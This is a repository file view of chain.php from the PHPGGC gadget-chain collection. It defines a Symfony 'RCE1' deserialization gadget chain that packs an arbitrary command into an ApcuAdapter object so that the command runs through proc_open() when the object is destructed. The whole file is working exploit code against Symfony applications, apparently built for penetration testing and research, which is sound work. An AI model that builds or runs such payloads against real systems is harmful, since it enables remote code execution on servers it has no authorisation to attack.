Codebase list phpggc / run/53b00efc-9205-491f-89cb-bf3a852e8a9d/main gadgetchains / Symfony / RCE / 1 / chain.php
run/53b00efc-9205-491f-89cb-bf3a852e8a9d/main

Tree @run/53b00efc-9205-491f-89cb-bf3a852e8a9d/main (Download .tar.gz)

chain.php @run/53b00efc-9205-491f-89cb-bf3a852e8a9d/mainraw · history · blame

<?php

namespace GadgetChain\Symfony;

class RCE1 extends \PHPGGC\GadgetChain\RCE\Command
{
    public static $version = '3.3';
    public static $vector = '__destruct';
    public static $author = 'cf';
    public static $information = 'Executes given command through proc_open()';

    public function generate(array $parameters)
    {
        $command = $parameters['command'];

        return new \Symfony\Component\Cache\Adapter\ApcuAdapter(
        	$command
        );
    }
}